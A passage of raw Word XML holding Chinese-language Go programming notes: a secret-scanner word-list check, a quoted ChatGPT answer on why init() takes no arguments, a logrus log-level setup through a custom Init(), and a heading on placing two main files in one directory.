    <w:p w14:paraId="300C7B96" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多线域内：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EDF58B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if strings.Contains(wordListText, finding.Secret) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F1BD58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("ssssssssssssssss")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF9CFBC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A30EF4" w14:textId="0CC7B4AC" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646ADBB6" w14:textId="727BBBEB" w:rsidR="00D51527" w:rsidRDefault="00D51527" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE5084E" w14:textId="392625CF" w:rsidR="00D51527" w:rsidRPr="00D51527" w:rsidRDefault="00705F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="317" w:name="_Toc159779774"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何让某包在初始化的时候，接受外部传参</w:t>
      </w:r>
      <w:bookmarkEnd w:id="317"/>
    </w:p>
    <w:p w14:paraId="1DCB2156" w14:textId="4D2B5279" w:rsidR="00D51527" w:rsidRDefault="00D51527" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1207C0A1" w14:textId="2F001C7B" w:rsidR="00705F2B" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chatGPT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>告诉我如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32517174" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26A600A8" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304C28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>The init() function in a Go package is a special function that is called automatically when the package is first imported. It is used to set up any necessary state or perform any initialization tasks for the package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4973ECCC" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F5017AF" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304C28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>However, the init() function cannot accept any arguments as it is a special function that is automatically called by the Go runtime. It is not designed to be called manually, so there is no way to pass arguments to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA9A303" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CDF8F79" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304C28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>If you need to pass arguments to a package during initialization, you could create a separate function that performs the initialization and accepts arguments. Then, you can call this function manually after importing the package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778FBF37" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="112FEB98" w14:textId="60A78BE7" w:rsidR="00705F2B" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304C28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>For example, you could create a package like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F67D1C8" w14:textId="7CE7DA77" w:rsidR="00705F2B" w:rsidRPr="00304C28" w:rsidRDefault="00705F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D8E5BF" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304C28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>package mypackage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F2CC3F" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07924A08" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304C28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>var myVar int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122ED0C7" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290C1ACA" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304C28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func Init(arg int) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506C8F93" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304C28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    myVar = arg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B50E53" w14:textId="6FCCCC39" w:rsidR="00705F2B" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304C28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9643D7" w14:textId="32B55577" w:rsidR="00705F2B" w:rsidRPr="00304C28" w:rsidRDefault="00705F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E500333" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304C28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import "mypackage"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E97B224" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C99D728" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304C28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E00FB2" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304C28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    mypackage.Init(42)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C6E44C" w14:textId="77777777" w:rsidR="00CB15E3" w:rsidRPr="00304C28" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304C28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Now the package is initialized with the value 42 for myVar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719C7F35" w14:textId="53312022" w:rsidR="00705F2B" w:rsidRDefault="00CB15E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00304C28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA9E3B0" w14:textId="0F907E34" w:rsidR="00705F2B" w:rsidRDefault="00705F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35464B43" w14:textId="12979C7A" w:rsidR="00705F2B" w:rsidRDefault="00C027DD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我通过命令行操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>logoru</w:t>
      </w:r>
      <w:r>
        <w:t>.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的代码基本使用自定义的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Init</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代替了默认的构造函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来实现自定义代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等级，如下</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5AB9C7" w14:textId="7C95EFBD" w:rsidR="00B83861" w:rsidRDefault="00B83861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F1B2DCF" w14:textId="529A531E" w:rsidR="00B83861" w:rsidRDefault="00B83861" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本就不用默认的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543FD9B9" w14:textId="476DA4E7" w:rsidR="00C027DD" w:rsidRDefault="00C027DD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="545BFFB1" w14:textId="794F4158" w:rsidR="00C027DD" w:rsidRDefault="00C027DD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00960EA9">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cmd.root.go</w:t>
      </w:r>
      <w:r w:rsidRPr="00960EA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32895CC7" w14:textId="0C7A35C6" w:rsidR="00C027DD" w:rsidRDefault="00C027DD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00960EA9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>rootCmd.PersistentFlags().Uint32VarP(&amp;logLevel, "log", "v", 4, "log level. 4 is InfoLevel, 5, 6 is DebugLevel and TraceLevel")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08449485" w14:textId="2601AC67" w:rsidR="00C027DD" w:rsidRDefault="00C027DD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293FA723" w14:textId="46858C35" w:rsidR="00960EA9" w:rsidRDefault="00960EA9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00960EA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="00960EA9">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.go</w:t>
      </w:r>
      <w:r w:rsidRPr="00960EA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00440504" w14:textId="77777777" w:rsidR="00EB675D" w:rsidRPr="00EB675D" w:rsidRDefault="00EB675D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB675D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>//func init() {</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB675D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB675D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB675D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>判断用户是否输入准确</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB675D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB675D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>默认是</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB675D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB675D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB675D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>logrus.SetLevel(logrus.TraceLevel)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB675D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
        <w:t>//}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D68B560" w14:textId="77777777" w:rsidR="00960EA9" w:rsidRPr="00960EA9" w:rsidRDefault="00960EA9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4502FB8B" w14:textId="77777777" w:rsidR="00960EA9" w:rsidRPr="00960EA9" w:rsidRDefault="00960EA9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960EA9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>func Init(log_level uint32) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E78CAE8" w14:textId="77777777" w:rsidR="00960EA9" w:rsidRPr="00960EA9" w:rsidRDefault="00960EA9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960EA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00960EA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>判断用户是否输入准确</w:t>
      </w:r>
      <w:r w:rsidRPr="00960EA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00960EA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>默认是</w:t>
      </w:r>
      <w:r w:rsidRPr="00960EA9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0CDDBB" w14:textId="77777777" w:rsidR="00960EA9" w:rsidRPr="00960EA9" w:rsidRDefault="00960EA9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00960EA9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>logrus.SetLevel(</w:t>
      </w:r>
      <w:r w:rsidRPr="00913EC3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>logrus.Level(log_level)</w:t>
      </w:r>
      <w:r w:rsidRPr="00960EA9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0A7744" w14:textId="57A3124B" w:rsidR="00C027DD" w:rsidRDefault="00960EA9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00960EA9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E9AEA0" w14:textId="36DCD417" w:rsidR="00705F2B" w:rsidRDefault="00705F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C15763" w14:textId="77777777" w:rsidR="00705F2B" w:rsidRDefault="00705F2B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E4660D7" w14:textId="77777777" w:rsidR="00D51527" w:rsidRDefault="00D51527" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28816E33" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="318" w:name="_Toc159779775"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同一个目录下，如何放两个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且可以分别编译？</w:t>
      </w:r>
      <w:bookmarkEnd w:id="318"/>
    </w:p>
    <w:p w14:paraId="086D5FEA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67054F20" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的同一个目录下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件只能都声明同一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命名，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>不能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>声明不同的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>名字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
